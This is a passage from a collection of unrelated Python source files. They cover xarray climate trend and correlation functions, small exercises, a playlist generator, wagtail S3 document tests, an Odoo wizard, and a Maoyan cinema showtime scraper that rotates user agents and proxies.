keep_attrs=keep_attrs)\n attrs['period'] = data.attrs['period'] # copy\n\n # Convert to standard time axis\n idates = data[dim].values.astype('long') # Nano Seconds\n idates -= idates[0] # relative Times\n # Trends\n # k = [unit]/time\n params = ff.cal.linear_trend(data.values, idates, method=method, alpha=alpha, nmin=min_periods, axis=axis)\n # slope and intercept\n idx = [slice(None)] * params.ndim\n idx[axis] = 0 # slope\n slope = DataArray(params[tuple(idx)] * per, coords=coords, dims=dimens, name='slope', attrs=attrs)\n ff.xarray.set_attrs(slope, 'units', add='/day', default='1/day')\n ff.xarray.set_attrs(slope, 'standard_name', add='_trend', default='trend')\n slope.attrs['cell_method'] = 'daily trend of anomalies' if use_anomalies else 'daily trend'\n if only_slopes:\n return slope\n\n idx[axis] = 1 # slope\n interc = DataArray(params[tuple(idx)], coords=coords, dims=dimens, name='intercept', attrs=attrs)\n ff.xarray.set_attrs(interc, 'standard_name', add='_intercept', default='intercept')\n\n if params.shape[axis] > 2:\n if method == 'theil_sen':\n idx[axis] = 2 # slope lower\n aslope = DataArray(params[tuple(idx)] * per, coords=coords, dims=dimens, name='slope_min', attrs=attrs)\n ff.xarray.set_attrs(aslope, 'units', add='/day', default='1/day')\n ff.xarray.set_attrs(aslope, 'standard_name', add='_trend_min', default='trend_min')\n aslope.attrs['alpha'] = alpha\n aslope.attrs['cell_method'] = 'daily trend of anomalies' if use_anomalies else 'daily trend'\n\n idx[axis] = 3 # slope upper\n bslope = DataArray(params[tuple(idx)] * per, coords=coords, dims=dimens, name='slope_max', attrs=attrs)\n ff.xarray.set_attrs(bslope, 'units', add='/day', default='1/day')\n ff.xarray.set_attrs(bslope, 'standard_name', add='_trend_max', default='trend_max')\n bslope.attrs['alpha'] = alpha\n bslope.attrs['cell_method'] = 'daily trend of anomalies' if use_anomalies else 'daily trend'\n\n return Dataset({'slope': slope, 'intercept': interc, 'lower': aslope, 'upper': bslope})\n\n # r_value, p_value, std_err\n idx[axis] = 2 # R-value\n rslope = DataArray(params[tuple(idx)] ** 2, coords=coords, dims=dimens, name='r_squared', attrs=attrs)\n rslope.attrs['units'] = '1'\n ff.xarray.set_attrs(rslope, 'standard_name', add='_r_squared', default='r_squared')\n\n idx[axis] = 3 # p-value\n bslope = DataArray(params[tuple(idx)], coords=coords, dims=dimens, name='p_value', attrs=attrs)\n bslope.attrs['units'] = '1'\n ff.xarray.set_attrs(bslope, 'standard_name', add='_p_value', default='p_value')\n bslope.attrs['cell_method'] = 'p-value for null hypothesis(slope==0)'\n\n idx[axis] = 4 # std err\n sslope = DataArray(params[tuple(idx)], coords=coords, dims=dimens, name='std_err', attrs=attrs)\n ff.xarray.set_attrs(sslope, 'units', add='/day', default='1/day')\n ff.xarray.set_attrs(sslope, 'standard_name', add='_std_err', default='std_err')\n sslope.attrs['cell_method'] = 'standard error of slope'\n\n return Dataset({'slope': slope, 'intercept': interc, 'r_squared': rslope, 'p_value': bslope, 'std_err': sslope})\n\n return Dataset({'slope': slope, 'intercept': interc})\n\n\ndef trend_mon_percentile(data, dim='time', percentile=None, period=None,\n min_periods=3, min_per_month=15, method='lsq', **kwargs):\n \"\"\" Monthly percentile trends\n\n Args:\n data (DataArray): input dataset\n dim (str): datetime dimension\n percentile (list): percentiles, int 1-99\n period (slice): datetime period for climatology\n min_periods (int): minimum values for trend\n min_per_month (int): minimum monthly count\n method (str): trend method\n **kwargs:\n\n Returns:\n Dataset : slope_perc_XX for each percentile\n \"\"\"\n import numpy as np\n from xarray import DataArray\n from .. import fun as ff\n if not isinstance(data, DataArray):\n raise ValueError(\"Requires a DataArray class object\")\n\n if percentile is None:\n percentile = [25, 50, 75] # Quartils\n else:\n if any([iq < 1 for iq in percentile]):\n raise ValueError('Percentiles need to be integers [1, 99]')\n\n data = data.copy()\n axis = data.dims.index(dim)\n #\n # Call wrapper for nanpercentile -> add as new dimension\n #\n tmp = data.resample(**{dim: 'M'}).apply(ff.xarray.xarray_function_wrapper,\n wfunc=ff.cal.sample_wrapper,\n add_dim='prc',\n dim=dim,\n axis=axis,\n ffunc=np.nanpercentile,\n nmin=min_per_month,\n q=percentile)\n #\n # Call trend with\n #\n trends = trend(tmp, dim=dim, period=period, use_anomalies=False,\n min_periods=min_periods, method=method, only_slopes=True, **kwargs)\n #\n # Add metadata\n #\n ff.xarray.set_attrs(trends, 'standard_name', add='_perc', default='percentiles')\n trends.attrs['cell_method'] = 'daily trend of monthly percentiles'\n trends.attrs['min_per_month'] = min_per_month\n #\n # Assign Coordinate information\n #\n trends = trends.assign_coords({'prc': percentile})\n trends['prc'].attrs.update({'units': '%', 'standard_name': 'percentile'})\n return trends\n\n\ndef trend_per_month(data, dim='time', **kwargs):\n \"\"\" Trends per month\n\n Args:\n data (DataArray): input dataset\n dim (str): datetime dimension\n **kwargs:\n\n Returns:\n DataArray :\n \"\"\"\n from xarray import DataArray, Dataset\n if not isinstance(data, (DataArray, Dataset)):\n raise ValueError(\"Requires a xarray DataArray, Dataset\", type(data))\n\n if dim not in data.dims:\n raise ValueError(\"datetime dimension not found\")\n\n trends = data.groupby(dim + '.month').apply(trend, dim=dim, use_anomalies=False, **kwargs)\n return trends\n\n\n#\n# Correlations\n#\n\n\ndef correlate(x, y, dim='time', period=None, method='spearman', **kwargs):\n \"\"\" Correlation between Arrays\n\n Args:\n x (DataArray): input dataset\n y (DataArray): input dataset\n dim (str): datetime dimension\n period (slice): consider only that datetime period\n method (str): either spearman or pearson\n **kwargs:\n\n Returns:\n DataArray : correlation coefficients\n \"\"\"\n from xarray import DataArray, align\n from .. import fun as ff\n\n if not isinstance(x, DataArray):\n raise ValueError(\"Requires a DataArray class object\")\n\n if not isinstance(y, DataArray):\n raise ValueError(\"Requires a DataArray class object\")\n\n if method not in ['spearman', 'pearson']:\n raise ValueError('Only spearman or pearson allowed')\n\n if dim not in x.dims or dim not in y.dims:\n raise ValueError('Dimension must be present in both Arrays')\n\n x = select_period(x, dim=dim, period=period)\n # Align\n x, y = align(x, y, join='left')\n axis = x.dims.index(dim)\n\n # def sp_corr(xx, yy, d, a):\n # jdims = list(xx.dims)\n # jdims.remove(d)\n # return apply_ufunc(ff.cal.spearman_correlation, xx, yy,\n # input_core_dims=[xx.dims, yy.dims],\n # output_core_dims=[jdims],\n # output_dtypes=[float],\n # kwargs={'axis': a},\n # keep_attrs=True)\n #\n # def ps_corr(xx, yy, d, a):\n # jdims = list(xx.dims)\n # jdims.remove(d)\n # return apply_ufunc(ff.cal.pearson_correlation, xx, yy,\n # input_core_dims=[xx.dims, yy.dims],\n # output_core_dims=[jdims],\n # output_dtypes=[float],\n # kwargs={'axis': a},\n # keep_attrs=True)\n\n if method == 'spearman':\n corr = ff.xarray.xarray_function_wrapper(x, wfunc=ff.cal.spearman_correlation, dim=dim, y=y, axis=axis)\n # corr = sp_corr(x, y, dim, axis)\n else:\n corr = ff.xarray.xarray_function_wrapper(x, wfunc=ff.cal.pearson_correlation, dim=dim, y=y, axis=axis)\n # corr = ps_corr(x, y, dim, axis)\n\n ff.xarray.set_attrs(corr, 'standard_name', add='_corr', default='correlation')\n corr.attrs['units'] = '1'\n corr.attrs['cell_method'] = '%s correlation with %s' % (method, y.name)\n return corr\n\n\ndef covariance(x, y, dim='time', period=None):\n \"\"\" Covariance\n\n Args:\n x:\n y:\n dim:\n period:\n\n Returns:\n\n \"\"\"\n from xarray import DataArray, align\n from .. import fun as ff\n\n if not isinstance(x, DataArray):\n raise ValueError(\"Requires a DataArray class object\")\n\n if not isinstance(y, DataArray):\n raise ValueError(\"Requires a DataArray class object\")\n\n if dim not in x.dims or dim not in y.dims:\n raise ValueError('Dimension must be present in both Arrays')\n\n x = select_period(x, dim=dim, period=period)\n # Align\n x, y = align(x, y, join='left')\n axis = x.dims.index(dim)\n\n # def nancov(xx, yy, d, a):\n # jdims = list(xx.dims)\n # jdims.remove(d)\n # return apply_ufunc(ff.cal.covariance, xx, yy,\n # input_core_dims=[xx.dims, yy.dims],\n # output_core_dims=[jdims],\n # output_dtypes=[float],\n # kwargs={'axis': a},\n # keep_attrs=True)\n #\n # corr = nancov(x, y, dim, axis)\n corr = ff.xarray.xarray_function_wrapper(x, wfunc=ff.cal.covariance, dim=dim, y=y, axis=axis)\n ff.xarray.set_attrs(corr, 'standard_name', add='_cov', default='covariance')\n ff.xarray.set_attrs(corr, 'units', add='2', default='2')\n ff.xarray.set_attrs(corr, 'cell_method', set='covariance with %s' % y.name)\n return corr\n\n\ndef day_night_departures(data, dim='time', day=12, night=0, **kwargs):\n \"\"\" Day-Night departures form dataset\n\n Args:\n data (DataArray): input dataset\n dim (str): datetime dimension\n day (int): hour of day: 12Z\n night (int): hour of night: 0Z\n **kwargs:\n\n Returns:\n\n \"\"\"\n from ..fun.xarray import set_attrs\n from .std import to_hours\n from xarray import DataArray, Dataset, set_options\n\n if not isinstance(data, (DataArray, Dataset)):\n raise ValueError('Requires a DataArray, Dataset', type(data))\n\n if dim not in data.dims:\n raise ValueError('Requires a datetime dimension', dim)\n\n data = to_hours(data, dim=dim, times=[day, night], **kwargs)\n attrs = data.attrs.copy()\n with set_options(keep_attrs=True):\n data = data.sel(hour=day) - data.sel(hour=night)\n data.attrs.update(attrs)\n if isinstance(data, DataArray):\n # data.name = data.name + '_dep'\n set_attrs(data, 'standard_name', add='_day_night_dep', default='day_night_departure')\n data.attrs['cell_method'] = 'noon - night'\n data.attrs['info'] = 'Day(%dZ)-Night(%dZ)' % (day, night)\n else:\n # data = data.rename({iname: iname + '_dep' for iname in data.data_vars})\n for iname in data.data_vars:\n set_attrs(data[iname], 'standard_name', add='_day_night_dep', default='day_night_dep')\n data[iname].attrs.update({'cell_method': 'noon - night', 'info': 'Day(%dZ)-Night(%dZ)' % (day, night)})\n return data\n\n\ndef statistics(x, f='rmse', y=None, dim='time', period=None, **kwargs):\n from xarray import DataArray\n from .. import fun as ff\n\n if not isinstance(x, DataArray):\n raise ValueError(\"Requires a DataArray, not\", type(x))\n\n if isinstance(f, str):\n try:\n f = getattr(ff.cal, f)\n except Exception as e:\n print('Function', f, 'not found in', ff.cal)\n raise e\n\n if period is not None:\n x = x.sel(**{dim: period})\n if y is not None:\n y = y.sel(**{dim: period})\n\n return ff.xarray.xarray_function_wrapper(x, wfunc=f, dim=dim, y=y, axis=x.dims.index(dim))\n\n\ndef resample_nanmean(data, dim='time', resample='M', nmin=15, **kwargs):\n \"\"\" Resample Dataset and apply a minimum for resampling mean\n\n Args:\n data (DataArray, Dataset): Input fields\n dim (str): datetime dimension\n resample (str): upsampling frequency\n nmin (int): minimum of samples per frequency\n **kwargs:\n\n Returns:\n DataArray, Dataset : means on freq\n \"\"\"\n import warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=RuntimeWarning)\n dd = data.resample(**{dim: resample}).count(dim)\n return data.resample(**{dim: resample}).mean(dim).where(dd > nmin)\n\n#\n# def fill_missing_hours(data, dim='time', hour='hour', times=(0, 12), **kwargs):\n# import numpy as np\n# from pandas import Index\n# from xarray import DataArray, concat\n# from ..fun import message\n#\n# if not isinstance(data, DataArray):\n# raise ValueError()\n#\n# if dim not in data.coords.keys():\n# raise ValueError()\n# if hour not in data.coords.keys():\n# raise ValueError()\n#\n# if not np.isin(np.array(times), data[hour].values).all():\n# raise ValueError()\n#\n# #\n# # hours not 0, 12 -> fill in to\n# #\n# data = data.copy()\n# data = dict(data.groupby(hour))\n# for ikey, idata in data.items():\n# if ikey in times:\n# continue\n#\n# if ikey >= 18 or ikey < 6:\n# jkey = 0\n# else:\n# jkey = 12\n# #\n# # from earlier times ?\n# #\n# logic = np.isfinite(data[jkey].values)\n# data[jkey].values = np.where(logic, data[jkey].values, idata.values)\n# message(ikey, \" (%s)>(%s) %d\" % (\",\".join([\"%d\" % i for i in data.keys()]),\n# \",\".join([\"%d\" % i for i in times]),\n# sum(~logic & np.isfinite(idata.values)).sum()), **kwargs)\n# return concat([data[0], data[12]], dim=Index(times, name=hour, )).sortby(dim)\n","sub_path":"rasotools/met/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":20853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"241722657","text":"permut = input()\n\n\ndef repeticoes(permutacao):\n permutacao = permutacao.split()\n rep = []\n for i in range(len(permutacao)-1):\n for j in range(i+1, len(permutacao)):\n if permutacao[i] == permutacao[j]:\n rep.append(permutacao[j])\n return rep\n\n\ndef inverter(permutacao):\n permutacao = permutacao.split()\n perm = []\n for i in range(len(permutacao)-1, -1, -1):\n perm.append(permutacao[i])\n inv = \" \"\n return inv.join(perm)\n\n\ndef inversao(permutacao):\n permutacao = permutacao.split()\n inv = []\n qtd_inv = 0\n for i in range(len(permutacao)-1):\n for j in range(i+1, len(permutacao)):\n if int(permutacao[i]) > int(permutacao[j]):\n a = (i+1, j+1)\n inv.append(a)\n qtd_inv += 1\n return inv, qtd_inv\n\n\ndef diferenca(permutacao):\n inv = inverter(permutacao)\n inv = inv.split()\n permutacao = permutacao.split()\n dif = []\n for i in range(len(permutacao)):\n subtracao = int(permutacao[i]) - int(inv[i])\n dif.append(subtracao)\n return dif\n\n\nsaida = repeticoes(permut)\nsaida2, qtd = inversao(permut)\nsaida3 = inverter(permut)\nsaida4 = diferenca(permut)\n\nprint(f\"Os elementos que se repetem são: {saida}\")\nprint(f\"Há {qtd} inversões, e as posições são: {saida2}\")\nprint(f\"Sequência inversa: {saida3}\")\nprint(f\"A sequência obtida da diferença é: {saida4}\")\n\n","sub_path":"Ad2/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"62272687","text":"from marvin import ai_fn\n\n\n@ai_fn\ndef tag_text(text: str) -> list[str]:\n \"\"\"\n Apply zero or more tags to the text from the following:\n - happy\n - polite\n - question\n - angry\n - confused\n - needs help\n - urgent\n - meme\n\n \"\"\"\n\n\ntag_text(\"i can has cheezburger?\") # ['question', 'meme']\ntag_text(\"can you help me please?\") # ['polite', 'question', 'needs help']\ntag_text(\"i need help YESTERDAY\") # ['needs help', 'urgent']\n","sub_path":"examples/ai_functions/tag_text.py","file_name":"tag_text.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"93604466","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport os\nimport sys\n\nimport loader\nimport iters\n\n\ndef output_playlist(path: str, playlist, ext=\"pls\"):\n for hour, tracks in playlist.items():\n file_name = os.path.join(path, \"{:02}.{}\".format(hour, ext))\n with open(file_name, mode=\"w\") as fp:\n for track in tracks:\n print(track.as_entry(), file=fp)\n\n\ndef prepend_base(base: str, path: str) -> str:\n if not base or os.path.isabs(path):\n return path\n return os.path.join(base, path)\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--config\", default=\"splist_config.json\", help=\"Configuration file.\")\n args = parser.parse_args()\n\n try:\n with open(args.config, mode=\"r\") as fp:\n config = json.load(fp)\n except IOError as err:\n print(\"Can not load config ({})\".format(err), file=sys.stderr)\n return 1\n # Check config version\n if config.get(\"version\", 1) != 2:\n print(\"Old configuration format detected, please upgrade configuration.\", file=sys.stderr)\n return 3\n\n try:\n tracks = loader.load_tracks(config[\"tracks\"])\n except IOError as err:\n print(\"Error while loading tracks ({})\".format(err), file=sys.stderr)\n return 4\n tr_iters = [i for i in tracks.values() if isinstance(i, iters.TimeRange)]\n tpl_pl = iters.TemplatePlaylist(config[\"hour_template\"], tracks)\n current_duration = 0.0\n current_hour = 0\n playlist = {}\n\n for i in tr_iters:\n i.set_time(0)\n for track in tpl_pl:\n if current_hour not in playlist:\n playlist[current_hour] = []\n playlist[current_hour].append(track)\n current_duration += track.duration\n if current_duration >= 3600.0:\n current_duration = 0.0\n current_hour += 1\n for i in tr_iters:\n i.set_time(current_hour * 3600)\n tpl_pl.rewind()\n if current_hour > 23:\n break\n try:\n output_playlist(\n prepend_base(config.get(\"base_path\"), config[\"output\"]),\n playlist,\n config.get(\"ext\", \"pls\")\n )\n except IOError as err:\n print(\"Can not output playlist ({}).\".format(err))\n return 3\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"splist.py","file_name":"splist.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"253575278","text":"import pandas as pd\nimport glob\nimport os\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\npath = '/home/hrituraj/Desktop/Internship/PressNotes/geomedia/Geomedia_extract_AGENDA/Geomedia_extract_AGENDA/'\n\n\nframe = pd.DataFrame()\n#Db = pd.read_csv('en_IND_hindti_int/rss_unique_TAG_country_Ebola.csv', error_bad_lines = False, sep ='\\t')\nAllFiles = []\ndf = pd.DataFrame()\n\nfor directory in os.listdir(path):\n if os.path.isdir(path + '/' + directory):\n new_path = path + '/' + directory\n db = pd.read_csv(new_path + '/' + \"rss_unique_TAG_country_Ebola.csv\",error_bad_lines = False,sep ='\\t')\n AllFiles.append(db)\n \n \ndf = pd.concat(AllFiles)\n\ndf['feed'] = df['feed'].astype(str).str[3:6]\nnew_df = df[['feed','TAG_country']].dropna()\nfinal_df = new_df.groupby(['feed','TAG_country']).size().reset_index(name = 'Weight')\n\nG = nx.Graph()\nG = nx.from_pandas_dataframe(final_df,'feed','TAG_country','Weight')\n\nnx.draw_random(G)\nplt.figure(1,figsize=(120,120)) \nplt.show()\nplt.savefig('graph.pdf')\nplt.hold()\n\n\n\n\n\n\n","sub_path":"Get_Data.py","file_name":"Get_Data.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"16724409","text":"#!/usr/bin/env python\n\n\"\"\"\nA demo app and wrapper around the implemented classes,\nacting as the entry point for the developer exercise solution.\n\nThis program needs the reference VCF file `testData.vcf` (not provided)\nin the execution directory.\n\nJudiciary Pag\nJanuary 2016\n\"\"\"\n\n# Useful stuff to come...\nfrom __future__ import print_function\n\nimport os.path\nimport sys\n\nimport SimpleVcfParser\nimport VariantStore\n\n# The filename of the test data...\nFILE_NAME = 'testData.vcf'\n\n# File must exist...\nif not os.path.isfile(FILE_NAME):\n print(\"Couldn't find test file (%s).\"\n \" Please put it in the execution directory.\" % FILE_NAME)\n sys.exit(1)\n\n# Create a variant store object (to accumulate file records)\n# and a VCF file parser to parse the example file...\nvariant_store = VariantStore.VariantStore()\nvcf_parser = SimpleVcfParser.SimpleVcfParser(FILE_NAME)\n\n# Iterate through the file\n# adding the extracted records to the variant store...\nfor vcf_record in vcf_parser:\n variant_store.add(vcf_record)\n\n# Done.\n\n# Get the collected data...\nsummary = variant_store.get_summary()\ngene_summary = variant_store.get_gene_summary()\n\n# ...and summarise...\nprint('Summary:')\nprint(' %s' % str(summary))\nprint('Gene Summary (%d):' % len(gene_summary))\nfor gene in sorted(gene_summary):\n print(' %s %s' % (gene, gene_summary[gene]))\n\n#variant_store.dump()\n","sub_path":"DeveloperTask.py","file_name":"DeveloperTask.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"330549242","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models, SUPERUSER_ID, _\nfrom odoo.exceptions import UserError\nimport datetime\n\n\nclass WizardSetupConsignment(models.TransientModel):\n _name = 'wizard.setup.consignment'\n\n def setup(self):\n consignment_location = self.setup_stock_location()\n\n return True\n\n @api.model\n def setup_stock_location(self):\n consignment_locations = \\\n self.env['stock.location'].search(\n [('consignment', '=', True),('usage', '=', 'internal')])\n if consignment_locations:\n return consignment_locations[0]\n vals = {\n 'name': _('Consignment warehouse'),\n 'consignment': True\n }\n consignment_location = self.env['stock.location'].create(vals)\n return consignment_location\n\n","sub_path":"ERP_IN/addons/btek_sale/wizard/models/wizard_setup_consignment.py","file_name":"wizard_setup_consignment.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"571044189","text":"class Solution(object):\n def addDigits(self, num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n if len(str(num)) == 1:\n return num\n\n num = str(num)\n result = 0\n\n while len(num) > 1:\n for i in reversed(range(len(num))):\n result += int(num[i])\n num = str(result)\n result = 0\n\n return int(num)\n\n def addDigits_02(self, num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n if num == 0:\n return 0\n else:\n return (num - 1) % 9 + 1\n","sub_path":"LPractice/258. Add Digits.py","file_name":"258. Add Digits.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"388838682","text":"from urllib.parse import urlparse\n\nfrom django.conf import settings\nfrom django.test import TestCase\nfrom django.test.client import Client\nfrom django.urls import reverse\n\nfrom wagtail.core.models import Collection\n\nimport boto3\nfrom moto import mock_s3\n\nfrom wagtail_storages.factories import CollectionViewRestrictionFactory, DocumentFactory\n\n\n@mock_s3\nclass AmazonS3DocumentTests(TestCase):\n def check_s3_url(self, url):\n return 's3.amazonaws.com' in url\n\n def check_url_signed(self, url):\n parsed_url = urlparse(url)\n # Make sure query parameters match signed URL's parameters\n return all(query_arg in parsed_url.query for query_arg in {\n 'AWSAccessKeyId',\n 'Signature',\n 'Expires',\n })\n\n def check_document_is_public(self, document):\n all_users = 'http://acs.amazonaws.com/groups/global/AllUsers'\n # Loop over all the grants.\n for grant in document.file.file.obj.Acl().grants:\n # Find the all users grantee.\n if 'URI' not in grant['Grantee']:\n continue\n if grant['Grantee']['URI'] == all_users:\n if grant['Permission'] == 'READ':\n return True\n return False\n\n def setUp(self):\n # Create S3 bucket\n bucket_name = settings.AWS_STORAGE_BUCKET_NAME\n conn = boto3.resource('s3', region_name='eu-west-1')\n conn.create_bucket(Bucket=bucket_name)\n\n self.client = Client()\n self.root_collection = Collection.get_first_root_node()\n self.private_collection = self.root_collection.add_child(\n name='Restricted collection',\n )\n self.private_collection_restriction = CollectionViewRestrictionFactory(collection=self.private_collection) # noqa\n self.view_restriction_session_key = self.private_collection_restriction.passed_view_restrictions_session_key # noqa\n\n def test_create_public_document(self):\n # Create document.\n document = DocumentFactory()\n\n # Check the document is on amazon's servers.\n self.assertTrue(self.check_s3_url(document.file.url))\n\n # Load the document\n url = reverse(\n 'wagtaildocs_serve',\n args=(document.id, document.filename),\n )\n response = self.client.get(url)\n\n # Test wagtail redirects to S3.\n self.assertEquals(response.status_code, 302)\n self.assertTrue(response.url)\n # Check object is public\n self.assertTrue(self.check_document_is_public(document))\n\n def test_create_private_document(self):\n # Create document.\n document = DocumentFactory()\n # Add the document to the private collection.\n document.collection = self.private_collection\n document.save()\n\n # Check the document is on amazon's servers.\n self.assertTrue(self.check_s3_url(document.file.url))\n\n # Authorise the session.\n s = self.client.session\n s.update({\n self.view_restriction_session_key: [self.private_collection_restriction.id], # noqa\n })\n s.save()\n\n # Load the document\n url = reverse(\n 'wagtaildocs_serve',\n args=(document.id, document.filename),\n )\n response = self.client.get(url)\n\n # Test wagtail redirects to S3.\n self.assertEquals(response.status_code, 302)\n self.assertTrue(response.url)\n # Check object is not public\n self.assertFalse(self.check_document_is_public(document))\n","sub_path":"wagtail_storages/tests/test_protected_documents.py","file_name":"test_protected_documents.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"327243112","text":"# -*- coding:utf-8 -*-\n# __author__ = \"shitou6\"\nimport json\nimport logging\nimport random\nimport traceback\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nlogger=logging.getLogger(__name__) # 设置日志名称\nlogger.setLevel(logging.INFO) #设置日志打印等级\nhandler=logging.FileHandler(\"log.txt\") # 创建日志文件\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')# 设置日志的打印格式\nhandler.setFormatter(formatter) #\nlogger.addHandler(handler)\n\ndef find_all_movies():\n movies_date = {}\n vip_days = []\n url = 'https://maoyan.com/cinema/12916?poi=4267320'\n USER_AGENTS = [\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5\"\n ]\n headers = {'User-Agent': random.choice(USER_AGENTS)}\n with open('ip.json', 'r') as file:\n data = json.load(file)\n try:\n r = requests.get(url=url, headers=headers, proxies=random.choice(data))\n r.raise_for_status()\n soup = BeautifulSoup(r.text, 'lxml')\n\n movies_id_list = soup.find('div', class_=\"movie-list\").find_all(\"div\", class_=\"movie\")\n\n movies = soup.find_all('div', class_='show-list')\n for each in movies: # 遍历每个电影\n dates = each.find('div', class_=\"show-date\").find_all('span', class_=\"date-item\")\n movie_name = (each.find('h3', class_=\"movie-name\").get_text())\n movies_date.setdefault(movie_name, {})\n\n movie_info = {\n \"info\": str(each.find(\"div\", class_=\"movie-desc\").text).replace(\"\\n\", \" \"),\n \"movie_id\": movies_id_list[movies.index(each)][\"data-movieid\"]\n }\n movies_date[movie_name]['movie_info'] = movie_info\n plist = list(each.find_all('div', class_='plist-container'))\n movies_date[movie_name].setdefault(\"movies_day\", [])\n for each_p in plist: # 遍历每一天\n try:\n movies_day = (\"{}日\".format(dates[plist.index(each_p)].get_text()))\n temp_dict = {movies_day: []}\n dangqi = each_p.find('tbody').find_all('tr')\n for each_tr in dangqi: # 遍历每一天的每一个档期\n things = each_tr.find_all('td')\n begin_time = things[0].find('span', class_='begin-time').get_text()\n end_time = str(things[0].find('span', class_='end-time').get_text()).replace(\"散场\", \"\")\n banben = things[1].get_text()\n ting = things[2].get_text().split('-')[0]\n print_str = (\n \"开场:{},结束:{},类型:{},大厅:{}\".format(begin_time, end_time, banben, ting).replace(\"\\n\", \"\"))\n # print(print_str)\n temp_dict[movies_day].append(print_str)\n if begin_time == \"18:00\":\n vip_days.append(\"{} | {} | {}\".format(movie_name, movies_day, print_str))\n movies_date[movie_name][\"movies_day\"].append(temp_dict)\n except:\n logger.error(traceback.format_exc())\n pass\n\n movies_date.setdefault('vip', vip_days)\n except:\n logger.error(traceback.format_exc())\n file = open('error.html', 'w', encoding='utf8')\n file.write(r.text)\n return movies_date\n\ndef pretty_dict(my_dict): # 美观打印\n # 利用json的打印 友好打印字典等结构。备用\n print(json.dumps(my_dict, ensure_ascii=False, indent=1))\n\ndef get_all_movie_names():\n data = find_all_movies()\n message = \"全部电影:\\n=======================\\n\"\n for key in data.keys():\n message += key\n message += '\\n'\n return message\n\n\n\ndef func(ddd):\n data = ddd\n func_meun = \"\"\"\n 1.查看当前所有电影\n 2.搜索电影档期\n 3.搜索会员档期\n \"\"\"\n print(func_meun)\n while 1:\n num = int(input(\"请输入数字:\"))\n if num == 1:\n for key in data.keys():\n print(key)\n if num == 2:\n movies_name = input(\"请输入电影名称\")\n for key in data.keys():\n if movies_name in key or movies_name == key:\n dd = data[key]\n pretty_dict(dd)\n if num == 3:\n pretty_dict(data['vip'])\n\n flag = input(\"是否继续:是(Y/y)\")\n if flag == 'y' or flag == 'Y':\n pass\n else:\n break\n pass\n\ndef find_movie(movie_name):\n data = find_all_movies()\n for key in data.keys():\n if movie_name in key or movie_name == key:\n dd = data[key]['movies_day']\n return dd\n return None\n\ndef find_vip_movie():\n data = find_all_movies()\n now_data = data['vip']\n\n def return_item(ss):\n return int(ss.split('|')[1].split(' ')[2].split('月')[1][:-1])\n\n now_data.sort(key=return_item)\n return now_data\n\ndef write_json():\n data = find_all_movies()\n file = open(\"data.json\", \"w\", encoding='utf8')\n json.dump(data, file, ensure_ascii=False)\n\ndef get_movies_info(word):\n data = find_all_movies()\n if data:\n for keys in data.keys():\n if word in keys:\n return get_movies_info_by_id(data[keys]['movie_info']['movie_id'])\n else:\n return None\n\n\n\ndef get_movies_info_by_id(movid_id): # 爬取电影的简介,评论等。\n url = 'https://maoyan.com/films/' + movid_id\n USER_AGENTS = [\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n 